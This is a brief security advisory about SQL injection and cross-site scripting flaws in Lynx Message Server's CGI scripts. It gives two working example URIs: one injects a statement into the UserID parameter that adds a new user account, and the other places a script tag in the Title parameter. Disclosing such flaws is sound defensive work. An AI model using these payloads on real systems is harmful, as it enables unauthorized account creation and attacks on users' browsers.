Lynx Message Server SQL Injection and Cross Site Scripting Vulnerabilities

Lynx Message Server SQL Injection and Cross Site Scripting Vulnerabilities

An attacker can exploit these issues with a browser. To exploit cross-site scripting issues, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available.

SQL injection:

http://www.example.com/cgi/email_password.plx?UserID=a'%3BINSERT+INTO+Users([User],[Password])+VALUES+('bede','bede')%3Bselect+Users.[Password],+Users.[User]+from+USERS+where+Users.[User]='b

Cross-site scripting:

http://www.example.com/cgi/wrapper.plx?Destination=addequipment.htm&Title=<script>alert('XSS')</script>